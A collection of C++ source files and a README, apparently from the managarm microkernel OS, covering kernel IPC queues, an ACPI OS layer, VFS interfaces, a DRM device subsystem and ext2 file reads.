		if(_currentProgress + length > _currentChunk->bufferSize) {
			_retireChunk();
			continue;
		}

		// Emit the next element to the current chunk.
		auto node = _nodeQueue.pop_front();

		auto dest = reinterpret_cast<Address>(_currentChunk->pointer)
				+ offsetof(ChunkStruct, buffer) + _currentProgress;
		assert(!(dest & 0x7));
		auto accessor = AddressSpaceLockHandle{_currentChunk->space,
				reinterpret_cast<void *>(dest), sizeof(ElementStruct) + length};
		_acquireNode.setup(nullptr);
		auto acq = accessor.acquire(&_acquireNode);
		assert(acq);

		// Write the element header, then the node's source buffers.
		ElementStruct element;
		memset(&element, 0, sizeof(element));
		element.length = length;
		element.context = reinterpret_cast<void *>(node->_context);
		auto err = accessor.write(0, &element, sizeof(ElementStruct));
		assert(!err);

		size_t disp = sizeof(ElementStruct);
		for(auto source = node->_source; source; source = source->link) {
			err = accessor.write(disp, source->pointer, source->size);
			assert(!err);
			disp += (source->size + 7) & ~size_t(7);
		}

		node->complete();

		// Update the chunk progress futex.
		_currentProgress += sizeof(ElementStruct) + length;
		_wakeProgressFutex(false);

		// Defer the next element to a worklet instead of looping here —
		// presumably to bound the time spent under the current locks.
		if(!_nodeQueue.empty())
			WorkQueue::post(&_nodeQueue.front()->_worklet);
		return;
	}
}
// Picks the next chunk from the user-space index ring and pins it. If
// user-space has not published a new index yet, this parks the queue on the
// head futex (_waitInFutex set by _waitHeadFutex()) and returns early.
void IpcQueue::_advanceChunk() {
	assert(!_currentChunk);

	if(_waitHeadFutex())
		return;

	// Read the chunk number from the index ring at _nextIndex.
	auto source = reinterpret_cast<Address>(_pointer) + offsetof(QueueStruct, indexQueue)
			+ (_nextIndex & ((1 << _sizeShift) - 1)) * sizeof(int);
	auto accessor = AddressSpaceLockHandle{_space,
			reinterpret_cast<void *>(source), sizeof(int)};
	_acquireNode.setup(nullptr);
	auto acq = accessor.acquire(&_acquireNode);
	assert(acq);

	size_t cn = accessor.read<int>(0);
	assert(cn < _chunks.size());
	assert(_chunks[cn].space);
	_currentChunk = &_chunks[cn];
	_nextIndex = ((_nextIndex + 1) & kHeadMask);

	// Pin the chunk header so _wakeProgressFutex() can access it directly.
	_chunkPin = AddressSpaceLockHandle{_currentChunk->space,
			_currentChunk->pointer, sizeof(ChunkStruct)};
	_acquireNode.setup(nullptr);
	auto acq_chunk = _chunkPin.acquire(&_acquireNode);
	assert(acq_chunk);
	_chunkAccessor = DirectSpaceAccessor<ChunkStruct>{_chunkPin, 0};
}
// Finishes the current chunk: signals completion through the progress futex
// (kProgressDone) and then drops all pins/accessors so the chunk can be
// reused. The wake must happen first — it still uses _chunkAccessor.
void IpcQueue::_retireChunk() {
	assert(_currentChunk);

	_wakeProgressFutex(true);

	_chunkAccessor = DirectSpaceAccessor<ChunkStruct>{};
	_chunkPin = AddressSpaceLockHandle{};
	_currentChunk = nullptr;
	_currentProgress = 0;
}
// Checks whether user-space has already published the next chunk index.
// Returns false if emission can proceed immediately; otherwise sets the
// kHeadWaiters bit via CAS, submits a futex wait and returns true (the
// Ops::woken worklet resumes _progress() once user-space advances the head).
bool IpcQueue::_waitHeadFutex() {
	struct Ops {
		static void woken(Worklet *worklet) {
			auto self = frg::container_of(worklet, &IpcQueue::_worklet);

			auto irq_lock = frigg::guard(&irqMutex());
			auto lock = frigg::guard(&self->_mutex);
			self->_waitInFutex = false;
			self->_progress();
		}
	};

	auto node = _nodeQueue.front();  // NOTE(review): 'node' appears unused here.
	while(true) {
		auto futex = __atomic_load_n(&_queueAccessor.get()->headFutex, __ATOMIC_ACQUIRE);
		do {
			// A differing head means a new index is available already.
			if(_nextIndex != (futex & kHeadMask))
				return false;

			// TODO: Contract violation errors should be reported to user-space.
			assert(futex == _nextIndex);
		} while(!__atomic_compare_exchange_n(&_queueAccessor.get()->headFutex, &futex,
				_nextIndex | kHeadWaiters, false, __ATOMIC_ACQUIRE, __ATOMIC_ACQUIRE));

		auto fa = reinterpret_cast<Address>(_pointer) + offsetof(QueueStruct, headFutex);
		_worklet.setup(&Ops::woken);
		_futex.setup(&_worklet);
		// Re-check the futex word when submitting the wait to close the race
		// between our CAS and a concurrent head update; if the check fails,
		// loop and re-evaluate.
		_waitInFutex = _space->futexSpace.checkSubmitWait(fa, [&] {
			return __atomic_load_n(&_queueAccessor.get()->headFutex, __ATOMIC_RELAXED)
					== (_nextIndex | kHeadWaiters);
		}, &_futex);

		if(_waitInFutex)
			return true;
	}
}
// Publishes the current progress (optionally tagged with kProgressDone) to
// the chunk's progress futex and wakes user-space waiters if any.
void IpcQueue::_wakeProgressFutex(bool done) {
	auto progress = _currentProgress;
	if(done)
		progress |= kProgressDone;
	auto futex = __atomic_exchange_n(&_chunkAccessor.get()->progressFutex,
			progress, __ATOMIC_RELEASE);

	// If user-space modifies any non-flags field, that's a contract violation.
	// TODO: Shut down the queue in this case.

	if(futex & kProgressWaiters) {
		auto fa = reinterpret_cast<Address>(_currentChunk->pointer)
				+ offsetof(ChunkStruct, progressFutex);
		_currentChunk->space->futexSpace.wake(fa);
	}
}
} // namespace thor
<file_sep>
#ifndef LIBARCH_REGISTER_HPP
#define LIBARCH_REGISTER_HPP
#include <stddef.h>
#include <arch/bits.hpp>
namespace arch {

// Typed descriptor of a hardware register: pairs a representation type with
// a bits type and remembers the register's offset within its register space.
template<typename Rep, typename Bits, typename Offset = ptrdiff_t>
struct basic_register {
	using rep_type = Rep;
	using bits_type = Bits;

	explicit constexpr basic_register(Offset offset)
	: _offset{offset} { }

	// Offset of this register relative to the start of its register space.
	Offset offset() const {
		return _offset;
	}

private:
	Offset _offset;
};

// Register whose representation and bits type coincide (plain scalars).
template<typename T, typename Offset = ptrdiff_t>
using scalar_register = basic_register<T, T, Offset>;

// Register that is accessed through a bit_value wrapper of its bits type.
template<typename Bits, typename Offset = ptrdiff_t>
using bit_register = basic_register<bit_value<Bits>, Bits, Offset>;

} // namespace arch
#endif // LIBARCH_REGISTER_HPP
<file_sep>
#include <string.h>
#include <iostream>
#include <cofiber.hpp>
#include <protocols/mbus/client.hpp>
#include "../common.hpp"
#include "../device.hpp"
#include "../util.hpp"
#include "../vfs.hpp"
namespace drm_subsystem {
namespace {

// Allocates minor numbers for DRM character devices.
id_allocator<uint32_t> minorAllocator;

// Static initializer: makes minors starting at 0 available.
struct Subsystem {
	Subsystem() {
		minorAllocator.use_range(0);
	}
} subsystem;

// A DRM UnixDevice backed by a remote driver; open() forwards to the driver
// through the stored lane.
struct Device : UnixDevice {
	Device(VfsType type, std::string name, helix::UniqueLane lane)
	: UnixDevice{type},
			_name{std::move(name)}, _lane{std::move(lane)} { }

	std::string nodePath() override {
		return _name;
	}

	FutureMaybe<smarter::shared_ptr<File, FileHandle>> open(std::shared_ptr<FsLink> link,
			SemanticFlags semantic_flags) override {
		return openExternalDevice(_lane, std::move(link), semantic_flags);
	}

private:
	std::string _name;
	helix::UniqueLane _lane;
};

} // anonymous namespace
// Observes mbus for entities tagged unix.subsystem=drm and installs a
// character device (major 226) for each one.
COFIBER_ROUTINE(cofiber::no_future, run(), ([] {
	auto root = COFIBER_AWAIT mbus::Instance::global().getRoot();

	auto filter = mbus::Conjunction({
		mbus::EqualsFilter("unix.subsystem", "drm")
	});

	auto handler = mbus::ObserverHandler{}
	.withAttach([] (mbus::Entity entity, mbus::Properties properties) {
		std::cout << "POSIX: Installing DRM device "
				<< std::get<mbus::StringItem>(properties.at("unix.devname")).value << std::endl;

		// NOTE(review): this lambda uses COFIBER_AWAIT but is not itself a
		// COFIBER_ROUTINE — confirm that attach handlers may await here.
		auto lane = helix::UniqueLane(COFIBER_AWAIT entity.bind());
		auto device = std::make_shared<Device>(VfsType::charDevice,
				std::get<mbus::StringItem>(properties.at("unix.devname")).value,
				std::move(lane));
		// The minor is only correct for card* devices but not for control* and render*.
		device->assignId({226, minorAllocator.allocate()});
		charRegistry.install(device);
	});

	COFIBER_AWAIT root.linkObserver(std::move(filter), std::move(handler));
}))
} // namespace drm_subsystem
<file_sep>#ifndef POSIX_SUBSYSTEM_FS_HPP
#define POSIX_SUBSYSTEM_FS_HPP
#include <iostream>
#include <set>
#include <async/result.hpp>
#include <boost/intrusive/rbtree.hpp>
#include <cofiber.hpp>
#include <cofiber/future.hpp>
#include <hel.h>
#include "file.hpp"
#include "fs.hpp"
// Major/minor number pair identifying a character or block device.
using DeviceId = std::pair<int, int>;

// Kind of a VFS inode.
enum class VfsType {
	null, directory, regular, symlink, charDevice, blockDevice, socket, fifo
};

// stat()-like metadata reported by a file system node.
struct FileStats {
	uint64_t inodeNumber;
	int numLinks;       // hard-link count
	uint64_t fileSize;  // in bytes
	uint32_t mode;      // permission/mode bits
	int uid, gid;       // owning user and group
	uint64_t atimeSecs, atimeNanos;  // last access time
	uint64_t mtimeSecs, mtimeNanos;  // last modification time
	uint64_t ctimeSecs, ctimeNanos;  // last status-change time
};
// Forward declarations.
struct FsLink;
struct FsNode;
// ----------------------------------------------------------------------------
// FsLink class.
// ----------------------------------------------------------------------------
// Represents a directory entry on an actual file system (i.e. not in the VFS).
struct FsLink {
	// FsLink is a polymorphic interface that is handled through base-class
	// pointers; a virtual destructor makes destroying derived links through
	// FsLink pointers well-defined.
	virtual ~FsLink() = default;

	// The directory that contains this entry.
	virtual std::shared_ptr<FsNode> getOwner() = 0;

	// Name of this entry within its owning directory.
	virtual std::string getName() = 0;

	// The node this entry points to.
	virtual std::shared_ptr<FsNode> getTarget() = 0;
};
// Per-file-system operations that are not tied to a single node.
struct FsSuperblock {
	// Polymorphic interface; virtual destructor for safe deletion through
	// base-class pointers.
	virtual ~FsSuperblock() = default;

	// Creates a new regular-file node on this file system.
	virtual FutureMaybe<std::shared_ptr<FsNode>> createRegular() = 0;

	// Creates a new socket node on this file system.
	virtual FutureMaybe<std::shared_ptr<FsNode>> createSocket() = 0;

	// Renames 'source' into 'directory' under the given name and yields
	// the resulting link.
	virtual async::result<std::shared_ptr<FsLink>> rename(FsLink *source,
			FsNode *directory, std::string name) = 0;
};
// ----------------------------------------------------------------------------
// FsNode class.
// ----------------------------------------------------------------------------
using SemanticFlags = uint32_t;
inline constexpr SemanticFlags semanticNonBlock = 1;
// Represents an inode on an actual file system (i.e. not in the VFS).
struct FsNode {
	// TODO: Remove this constructor once every FS has a superblock.
	FsNode()
	: _superblock{nullptr} { }

	FsNode(FsSuperblock *superblock)
	: _superblock{superblock} { }

	// FsNode is used polymorphically; a virtual destructor makes deleting
	// derived nodes through FsNode pointers well-defined.
	virtual ~FsNode() = default;

	// The file system this node belongs to (may be null, see TODO above).
	FsSuperblock *superblock() {
		return _superblock;
	}

	virtual VfsType getType();

	// TODO: This should be async.
	virtual FutureMaybe<FileStats> getStats();

	// For directories only: Returns a pointer to the link
	// that links this directory from its parent.
	virtual std::shared_ptr<FsLink> treeLink();

	//! Resolves a file in a directory (directories only).
	virtual FutureMaybe<std::shared_ptr<FsLink>> getLink(std::string name);

	//! Links an existing node to this directory (directories only).
	virtual FutureMaybe<std::shared_ptr<FsLink>> link(std::string name,
			std::shared_ptr<FsNode> target);

	//! Creates a new directory (directories only).
	virtual FutureMaybe<std::shared_ptr<FsLink>> mkdir(std::string name);

	//! Creates a new symlink (directories only).
	virtual FutureMaybe<std::shared_ptr<FsLink>> symlink(std::string name, std::string path);

	//! Creates a new device file (directories only).
	virtual FutureMaybe<std::shared_ptr<FsLink>> mkdev(std::string name,
			VfsType type, DeviceId id);

	//! Removes the named entry from this directory (directories only).
	virtual FutureMaybe<void> unlink(std::string name);

	//! Opens the file (regular files only).
	// TODO: Move this to the link instead of the inode?
	virtual FutureMaybe<smarter::shared_ptr<File, FileHandle>> open(std::shared_ptr<FsLink> link,
			SemanticFlags semantic_flags);

	// Reads the target of a symlink (symlinks only).
	// Returns illegalOperationTarget() by default.
	virtual expected<std::string> readSymlink(FsLink *link);

	//! Read the major/minor device number (devices only).
	virtual DeviceId readDevice();

private:
	FsSuperblock *_superblock;
};
#endif // POSIX_SUBSYSTEM_FS_HPP
<file_sep>
#include <frigg/debug.hpp>
#include <frigg/printf.hpp>
#include <frigg/memory.hpp>
#include "../../arch/x86/paging.hpp"
#include "../../arch/x86/pic.hpp"
#include "../../generic/irq.hpp"
#include "../../generic/kernel_heap.hpp"
#include "../../system/pci/pci.hpp"
extern "C" {
#include <acpi.h>
}
namespace {
	// Set to true to log the state of all fixed ACPI events on every SCI.
	constexpr bool logEverySci = false;
}
// Marks an OSL callback that thor does not implement yet; trips an assertion
// if ACPICA actually calls it.
#define NOT_IMPLEMENTED() do { assert(!"Fix this"); /* frigg::panicLogger() << "ACPI interface function " << __func__ << " is not implemented!" << frigg::endLog;*/ } while(0)
using namespace thor;
// --------------------------------------------------------
// Initialization and shutdown
// --------------------------------------------------------
// Called by ACPICA during subsystem initialization; nothing to set up here.
ACPI_STATUS AcpiOsInitialize() {
	return AE_OK;
}
ACPI_STATUS AcpiOsTerminate() {
	return AE_OK;
}
// Locates the RSDP via ACPICA's low-memory scan. Panics when the platform
// does not provide one, since thor cannot continue without ACPI.
ACPI_PHYSICAL_ADDRESS AcpiOsGetRootPointer() {
	ACPI_SIZE pointer;
	if(AcpiFindRootPointer(&pointer) != AE_OK)
		frigg::panicLogger() << "thor: Could not find ACPI RSDP table" << frigg::endLog;
	return pointer;
}
// --------------------------------------------------------
// Logging
// --------------------------------------------------------
// printf-style logging entry point used by ACPICA; forwards to the
// va_list variant below.
void ACPI_INTERNAL_VAR_XFACE AcpiOsPrintf(const char *format, ...) {
	va_list args;
	va_start(args, format);
	AcpiOsVprintf(format, args);
	va_end(args);
}
// Formats ACPICA log output into thor's info log.
void AcpiOsVprintf(const char *format, va_list args) {
	auto printer = frigg::infoLogger();
//	frigg::infoLogger() << "printf: " << format << frigg::endLog;
	frigg::printf(printer, format, args);
	// TODO: Call finish()?
	// printer.finish();
}
// --------------------------------------------------------
// Locks
// --------------------------------------------------------
// The spinlock OSL is not implemented yet; these are no-op stubs.
ACPI_STATUS AcpiOsCreateLock(ACPI_SPINLOCK *out_handle) {
	// TODO: implement this
	return AE_OK;
}
// NOTE(review): ACPICA declares this callback with an ACPI_SPINLOCK
// parameter; verify the ACPI_HANDLE type here against the installed headers.
void AcpiOsDeleteLock(ACPI_HANDLE handle) {
	// TODO: implement this
}
// this function should disable interrupts
ACPI_CPU_FLAGS AcpiOsAcquireLock(ACPI_SPINLOCK spinlock) {
	// TODO: implement this
	return 0;
}
// this function should re-enable interrupts
void AcpiOsReleaseLock(ACPI_SPINLOCK spinlock, ACPI_CPU_FLAGS flags) {
	// TODO: implement this
}
// --------------------------------------------------------
// Semaphores
// --------------------------------------------------------
// Allocates a counting semaphore for ACPICA.
// NOTE(review): max_units is currently ignored.
ACPI_STATUS AcpiOsCreateSemaphore(UINT32 max_units, UINT32 initial_units,
		ACPI_SEMAPHORE *out_handle) {
	auto semaphore = frigg::construct<AcpiSemaphore>(*kernelAlloc);
	semaphore->counter = initial_units;
	*out_handle = semaphore;
	return AE_OK;
}
ACPI_STATUS AcpiOsDeleteSemaphore(ACPI_SEMAPHORE handle) {
	NOT_IMPLEMENTED();
	return AE_OK;
}
// Increments the counter. Only single-unit operations are supported.
ACPI_STATUS AcpiOsSignalSemaphore(ACPI_SEMAPHORE handle, UINT32 units) {
	assert(units == 1);
	handle->counter++;
	return AE_OK;
}
// Decrements the counter. This implementation never actually blocks and
// ignores the timeout: it asserts that a unit is already available instead
// of waiting for one.
ACPI_STATUS AcpiOsWaitSemaphore(ACPI_SEMAPHORE handle, UINT32 units, UINT16 timeout) {
	assert(units == 1);
	assert(handle->counter > 0);
	handle->counter--;
	return AE_OK;
}
// --------------------------------------------------------
// Physical memory access
// --------------------------------------------------------
// Maps a physical range for ACPICA. Allocates a fixed 1 MiB window of kernel
// virtual address space, maps the page-aligned range into it and returns a
// pointer adjusted for the sub-page offset. Ranges larger than 1 MiB are
// rejected by assertion.
void *AcpiOsMapMemory(ACPI_PHYSICAL_ADDRESS physical, ACPI_SIZE length) {
	auto paddr = physical & ~(kPageSize - 1);
	auto vsize = length + (physical & (kPageSize - 1));
	assert(vsize <= 0x100000);
	auto ptr = KernelVirtualMemory::global().allocate(0x100000);
	// The loop condition covers a trailing partial page, since pg advances
	// in whole-page steps past vsize.
	for(size_t pg = 0; pg < vsize; pg += kPageSize)
		KernelPageSpace::global().mapSingle4k((VirtualAddr)ptr + pg, paddr + pg,
				page_access::write, CachingMode::null);
	return reinterpret_cast<char *>(ptr) + (physical & (kPageSize - 1));
}
// Unmaps a range previously mapped by AcpiOsMapMemory.
// NOTE: the virtual address window itself is currently leaked (see TODO).
void AcpiOsUnmapMemory(void *pointer, ACPI_SIZE length) {
	auto vaddr = (uintptr_t)pointer & ~(kPageSize - 1);
	auto vsize = length + ((uintptr_t)pointer & (kPageSize - 1));
	assert(vsize <= 0x100000);
	for(size_t pg = 0; pg < vsize; pg += kPageSize)
		KernelPageSpace::global().unmapSingle4k(vaddr + pg);
	//TODO: KernelVirtualMemory::global().free(pointer);
}
// --------------------------------------------------------
// Memory management
// --------------------------------------------------------
// Heap allocations for ACPICA, backed by the kernel heap.
void *AcpiOsAllocate(ACPI_SIZE size) {
	return kernelAlloc->allocate(size);
}
void AcpiOsFree(void *pointer) {
	kernelAlloc->free(pointer);
}
// --------------------------------------------------------
// Interrupts
// --------------------------------------------------------
namespace {
	// IRQ sink that forwards the ACPI SCI to the handler ACPICA installed.
	struct AcpiSink : IrqSink {
		AcpiSink(ACPI_OSD_HANDLER handler, void *context)
		: IrqSink{frigg::String<KernelAlloc>{*kernelAlloc, "acpi-sci"}},
				_handler{handler}, _context{context} { }
		IrqStatus raise() override {
			// Helper to dump the state of one fixed ACPI event.
			auto report = [] (unsigned int event, const char *name) {
				ACPI_EVENT_STATUS status;
				AcpiGetEventStatus(event, &status);
				const char *enabled = (status & ACPI_EVENT_FLAG_ENABLED) ? "enabled" : "disabled";
				const char *set = (status & ACPI_EVENT_FLAG_SET) ? "set" : "clear";
				frigg::infoLogger() << "    " << name << ": " << enabled
						<< " " << set << frigg::endLog;
			};
			if(logEverySci) {
				frigg::infoLogger() << "thor: Handling ACPI interrupt." << frigg::endLog;
				report(ACPI_EVENT_PMTIMER, "ACPI timer");
				report(ACPI_EVENT_GLOBAL, "Global lock");
				report(ACPI_EVENT_POWER_BUTTON, "Power button");
				report(ACPI_EVENT_SLEEP_BUTTON, "Sleep button");
				report(ACPI_EVENT_RTC, "RTC");
			}
			// Translate ACPICA's handler result into the kernel's IRQ protocol.
			auto result = _handler(_context);
			if(result == ACPI_INTERRUPT_HANDLED) {
				return IrqStatus::acked;
			}else{
				assert(result == ACPI_INTERRUPT_NOT_HANDLED);
				return IrqStatus::nacked;
			}
		}
	private:
		ACPI_OSD_HANDLER _handler;
		void *_context;
	};
}
// Attaches ACPICA's SCI handler to the GSI it requested.
ACPI_STATUS AcpiOsInstallInterruptHandler(UINT32 number,
		ACPI_OSD_HANDLER handler, void *context) {
	frigg::infoLogger() << "thor: Installing handler for ACPI IRQ " << number << frigg::endLog;
	auto sink = frigg::construct<AcpiSink>(*kernelAlloc, handler, context);
	auto pin = getGlobalSystemIrq(number);
	IrqPin::attachSink(pin, sink);
	// There are mainboards that raise the SCI before we actually enable it.
	// This is a problem if the SCI is level-triggered and we mask it because
	// there is no handler attached. Kick the IRQ so that it gets unmasked again.
	IrqPin::kickSink(sink);
	return AE_OK;
}
// Detaching the SCI handler is not supported yet.
ACPI_STATUS AcpiOsRemoveInterruptHandler(UINT32 interrupt,
		ACPI_OSD_HANDLER handler) {
	NOT_IMPLEMENTED();
	// NOT_IMPLEMENTED() only asserts, and assert() may be compiled out
	// (NDEBUG); return here to avoid flowing off the end of a
	// value-returning function, which is undefined behavior.
	return AE_NOT_IMPLEMENTED;
}
// --------------------------------------------------------
// Threads
// --------------------------------------------------------
// thor currently runs ACPICA from a single context; report a fixed thread ID.
ACPI_THREAD_ID AcpiOsGetThreadId() {
	return 1;
}
void AcpiOsSleep(UINT64 milliseconds) {
	NOT_IMPLEMENTED();
}
// NOTE(review): per the ACPICA OSL specification this argument is in
// *microseconds*, not milliseconds — confirm before implementing.
void AcpiOsStall(UINT32 milliseconds) {
	NOT_IMPLEMENTED();
}
UINT64 AcpiOsGetTimer() {
	NOT_IMPLEMENTED();
	// assert() may be compiled out (NDEBUG); avoid falling off the end of a
	// value-returning function (undefined behavior).
	return 0;
}
ACPI_STATUS AcpiOsSignal(UINT32 function, void *info) {
	NOT_IMPLEMENTED();
	return AE_NOT_IMPLEMENTED;
}
// --------------------------------------------------------
// Async execution
// --------------------------------------------------------
ACPI_STATUS AcpiOsExecute(ACPI_EXECUTE_TYPE type,
		ACPI_OSD_EXEC_CALLBACK function, void *context) {
	NOT_IMPLEMENTED();
	return AE_NOT_IMPLEMENTED;
}
void AcpiOsWaitEventsComplete() {
	NOT_IMPLEMENTED();
}
// --------------------------------------------------------
// Hardware access
// --------------------------------------------------------
ACPI_STATUS AcpiOsReadMemory(ACPI_PHYSICAL_ADDRESS address,
		UINT64 *value, UINT32 width) {
	NOT_IMPLEMENTED();
	return AE_NOT_IMPLEMENTED;
}
ACPI_STATUS AcpiOsWriteMemory(ACPI_PHYSICAL_ADDRESS address,
		UINT64 value, UINT32 width) {
	NOT_IMPLEMENTED();
	return AE_NOT_IMPLEMENTED;
}
// Reads an 8/16/32-bit value from an x86 I/O port on behalf of ACPICA.
ACPI_STATUS AcpiOsReadPort(ACPI_IO_ADDRESS address, UINT32 *value, UINT32 width) {
	uint16_t port = address;
	switch(width) {
	case 8: {
		uint8_t result;
		asm volatile ( "inb %1, %0" : "=a"(result) : "d"(port) );
		*value = result;
		break;
	}
	case 16: {
		uint16_t result;
		asm volatile ( "inw %1, %0" : "=a"(result) : "d"(port) );
		*value = result;
		break;
	}
	case 32: {
		uint32_t result;
		asm volatile ( "inl %1, %0" : "=a"(result) : "d"(port) );
		*value = result;
		break;
	}
	default:
		assert(!"Unexpected bit width for AcpiOsReadPort()");
	}
	return AE_OK;
}
// Writes an 8/16/32-bit value to an x86 I/O port on behalf of ACPICA.
ACPI_STATUS AcpiOsWritePort(ACPI_IO_ADDRESS address, UINT32 value, UINT32 width) {
	uint16_t port = address;
	switch(width) {
	case 8: {
		uint8_t to_write = value;
		asm volatile ( "outb %0, %1" : : "a"(to_write), "d"(port) );
		break;
	}
	case 16: {
		uint16_t to_write = value;
		asm volatile ( "outw %0, %1" : : "a"(to_write), "d"(port) );
		break;
	}
	case 32: {
		uint32_t to_write = value;
		asm volatile ( "outl %0, %1" : : "a"(to_write), "d"(port) );
		break;
	}
	default:
		assert(!"Unexpected bit width for AcpiOsWritePort()");
	}
	return AE_OK;
}
// Reads a PCI configuration-space register for ACPICA.
// Only segment 0 is supported (asserted below).
ACPI_STATUS AcpiOsReadPciConfiguration(ACPI_PCI_ID *target, UINT32 offset,
		UINT64 *value, UINT32 width) {
/*	std::cout << "segment: " << target->Segment
			<< ", bus: " << target->Bus
			<< ", slot: " << target->Device
			<< ", function: " << target->Function << std::endl;*/
	assert(!target->Segment);
	switch(width) {
	case 8:
		*value = readPciByte(target->Bus, target->Device, target->Function, offset);
		break;
	case 16:
		*value = readPciHalf(target->Bus, target->Device, target->Function, offset);
		break;
	case 32:
		*value = readPciWord(target->Bus, target->Device, target->Function, offset);
		break;
	default:
		frigg::panicLogger() << "Unexpected PCI access width" << frigg::endLog;
	}
	return AE_OK;
}
// Writes a PCI configuration-space register for ACPICA.
// Only segment 0 is supported (asserted below).
ACPI_STATUS AcpiOsWritePciConfiguration(ACPI_PCI_ID *target, UINT32 offset,
		UINT64 value, UINT32 width) {
	assert(!target->Segment);
	switch(width) {
	case 8:
		writePciByte(target->Bus, target->Device, target->Function, offset, value);
		break;
	case 16:
		writePciHalf(target->Bus, target->Device, target->Function, offset, value);
		break;
	case 32:
		writePciWord(target->Bus, target->Device, target->Function, offset, value);
		break;
	default:
		frigg::panicLogger() << "Unexpected PCI access width" << frigg::endLog;
	}
	return AE_OK;
}
// --------------------------------------------------------
// Table / object override
// --------------------------------------------------------
// The following callbacks allow the OS to override predefined objects and
// ACPI tables. thor performs no overrides, so they all report "no
// replacement" by returning a null/zero result.
ACPI_STATUS AcpiOsPredefinedOverride(const ACPI_PREDEFINED_NAMES *predefined,
		ACPI_STRING *new_value) {
	*new_value = nullptr;
	return AE_OK;
}
ACPI_STATUS AcpiOsTableOverride(ACPI_TABLE_HEADER *existing,
		ACPI_TABLE_HEADER **new_table) {
	*new_table = nullptr;
	return AE_OK;
}
ACPI_STATUS AcpiOsPhysicalTableOverride(ACPI_TABLE_HEADER *existing,
		ACPI_PHYSICAL_ADDRESS *new_address, UINT32 *new_length) {
	*new_address = 0;
	return AE_OK;
}
<file_sep>
namespace thor {
namespace acpi {
// Two-stage ACPI bring-up entry points (declarations only; defined in the
// ACPI subsystem sources).
void initializeBasicSystem();
void initializeExtendedSystem();
} } // namespace thor::acpi
<file_sep># The managarm Operating System

## What is this about?
This is the main repository of managarm, a microkernel-based operating system.
**What is special about managarm?** Some notable properties of managarm are:
(i) managarm is based on a microkernel while common desktop operating systems like Linux and Windows use monolithic kernels,
(ii) managarm uses a completely asynchronous API for I/O
and (iii) despite those internal differences, managarm provides good compatibility with Linux at the user space level.
**Aren't microkernels slow?** Microkernels do have some performance disadvantages over monolithic kernels.
managarm tries to mitigate some of those issues by providing good abstractions (at the driver and system call levels)
that allow efficient implementations of common user space functionality (like POSIX).
**Is this a Linux distribution?** No, managarm runs its own kernel that does not originate from Linux.
While the managarm user space API supports many Linux APIs (e.g. epoll, timerfd, signalfd or tmpfs),
managarm does not share any source code (or binaries) with the Linux kernel.
## Supported Software
Currently, Weston (the Wayland reference compositor) and GNU Bash run on managarm.
## Supported Hardware
**General** USB (UHCI, EHCI)\
**Graphics** Generic VBE graphics, Intel G45, virtio GPU, Bochs VBE interface\
**Input** USB human interface devices, PS/2 keyboard and mouse\
**Storage** USB mass storage devices, ATA, virtio block
## Building managarm
While this repository contains managarm's kernel, its drivers and other core functionality,
it is not enough to build a full managarm distribution. Instead, we refer to the
[bootstrap-managarm](https://github.com/managarm/bootstrap-managarm) repository for build instructions.
<file_sep>
#include <stdio.h>
#include <string.h>
#include <iostream>
#include <helix/ipc.hpp>
#include <helix/await.hpp>
#include <protocols/fs/server.hpp>
#include <protocols/mbus/client.hpp>
#include <blockfs.hpp>
#include "gpt.hpp"
#include "ext2fs.hpp"
#include "fs.pb.h"
namespace blockfs {
// TODO: Support more than one table.
gpt::Table *table;
ext2fs::FileSystem *fs;
namespace {
// Seeks to an absolute position in the file and returns the new offset.
COFIBER_ROUTINE(async::result<protocols::fs::SeekResult>, seekAbs(void *object,
		int64_t offset), ([=] {
	auto self = static_cast<ext2fs::OpenFile *>(object);
	self->offset = offset;
	COFIBER_RETURN(self->offset);
}))
// Seeks relative to the current position and returns the new offset.
COFIBER_ROUTINE(async::result<protocols::fs::SeekResult>, seekRel(void *object,
		int64_t offset), ([=] {
	auto self = static_cast<ext2fs::OpenFile *>(object);
	self->offset += offset;
	COFIBER_RETURN(self->offset);
}))
// Reads up to |length| bytes at the current offset through the inode's page
// cache (frontalMemory) and advances the offset accordingly.
// Returns 0 at end-of-file.
COFIBER_ROUTINE(async::result<protocols::fs::ReadResult>, read(void *object, const char *,
		void *buffer, size_t length), ([=] {
	assert(length);
	auto self = static_cast<ext2fs::OpenFile *>(object);
	// Wait until the inode's on-disk metadata (e.g. its size) is available.
	COFIBER_AWAIT self->inode->readyJump.async_wait();
	// Clamp the read to the remaining file contents.
	assert(self->offset <= self->inode->fileSize());
	auto remaining = self->inode->fileSize() - self->offset;
	auto chunk_size = std::min(length, remaining);
	if(!chunk_size)
		COFIBER_RETURN(0); // TODO: Return an explicit end-of-file error?
	// Compute the page-aligned window of the page cache covering the chunk.
	auto chunk_offset = self->offset;
	auto map_offset = chunk_offset & ~size_t(0xFFF);
	auto map_size = ((chunk_offset + chunk_size) & ~size_t(0xFFF)) - map_offset + 0x1000;
	self->offset += chunk_size;
	// Make sure the pages are resident before mapping them.
	helix::LockMemoryView lock_memory;
	auto &&submit = helix::submitLockMemoryView(helix::BorrowedDescriptor(self->inode->frontalMemory),
			&lock_memory, map_offset, map_size, helix::Dispatcher::global());
	COFIBER_AWAIT(submit.async_wait());
	HEL_CHECK(lock_memory.error());
	// Map the page cache into the address space.
	helix::Mapping file_map{helix::BorrowedDescriptor{self->inode->frontalMemory},
			map_offset, map_size,
			kHelMapProtRead | kHelMapDontRequireBacking};
	memcpy(buffer, reinterpret_cast<char *>(file_map.get()) + (chunk_offset - map_offset),
			chunk_size);
	COFIBER_RETURN(chunk_size);
}))
// Writes |length| bytes at the current offset and advances the offset.
COFIBER_ROUTINE(async::result<void>, write(void *object, const char *,
		const void *buffer, size_t length), ([=] {
	assert(length);
	auto self = static_cast<ext2fs::OpenFile *>(object);
	COFIBER_AWAIT self->inode->fs.write(self->inode.get(), self->offset, buffer, length);
	self->offset += length;
}))
// Hands out the inode's page-cache memory so clients can mmap() file contents.
COFIBER_ROUTINE(async::result<protocols::fs::AccessMemoryResult>,
		accessMemory(void *object, uint64_t offset, size_t size), ([=] {
	auto self = static_cast<ext2fs::OpenFile *>(object);
	COFIBER_AWAIT self->inode->readyJump.async_wait();
	assert(offset + size <= self->inode->fileSize());
	COFIBER_RETURN(std::make_pair(helix::BorrowedDescriptor{self->inode->frontalMemory}, offset));
}))
// Reads the next batch of directory entries from an open directory.
COFIBER_ROUTINE(async::result<protocols::fs::ReadEntriesResult>,
		readEntries(void *object), ([=] {
	auto self = static_cast<ext2fs::OpenFile *>(object);
	COFIBER_RETURN(COFIBER_AWAIT self->readEntries());
}))
// Operation table installed for every open file served by this driver.
